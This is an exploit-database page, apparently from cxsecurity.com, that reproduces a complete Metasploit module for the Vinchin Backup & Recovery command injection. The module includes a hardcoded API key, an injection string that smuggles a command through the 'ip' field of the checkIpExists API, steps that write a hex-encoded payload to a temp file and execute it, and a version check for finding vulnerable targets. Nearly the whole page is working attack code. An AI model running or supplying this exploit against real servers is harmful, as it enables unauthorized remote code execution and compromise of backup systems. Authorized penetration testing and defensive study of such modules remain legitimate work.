Vinchin Backup And Recovery Command Injection

2023.12.24
Credit: Valentin Lobstein
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Vinchin Backup and Recovery Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gregory Boddin (LeakIX)', # Vulnerability discovery 'Valentin Lobstein' # Metasploit module ], 'References' => [ ['CVE', '2023-45498'], ['CVE', '2023-45499'], ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'], ['URL', 'https://vinchin.com/'] # Vendor URL ], 'DisclosureDate' => '2023-10-26', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'AKA' => ['Vinchin Command Injection'] }, 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true, 'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp' }, 'Privileged' => false ) ) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']), OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']), ] ) end def exploit hex_encoded_payload = payload.encoded.unpack('H*').first formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}" command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}" send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], 'api/'), 'vars_get' => { 'm' => '30', 'f' => 'checkIpExists', 'k' => datastore['APIKEY'] }, 'data' => "p={\"ip\":\"a||#{command}\"}" }) end def check target_uri_path = normalize_uri(target_uri.path, 'login.php') res = send_request_cgi('uri' => target_uri_path) return CheckCode::Unknown('Failed to connect to the target.') unless res return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200 version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/ version_match = res.body.match(version_pattern) unless version_match && version_match[1] return CheckCode::Unknown('Unable to extract version.') end version = Rex::Version.new(version_match[1]) print_status("Detected Vinchin version: #{version}") if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) || (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) || (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) || (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2')) return CheckCode::Appears else return CheckCode::Safe end end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top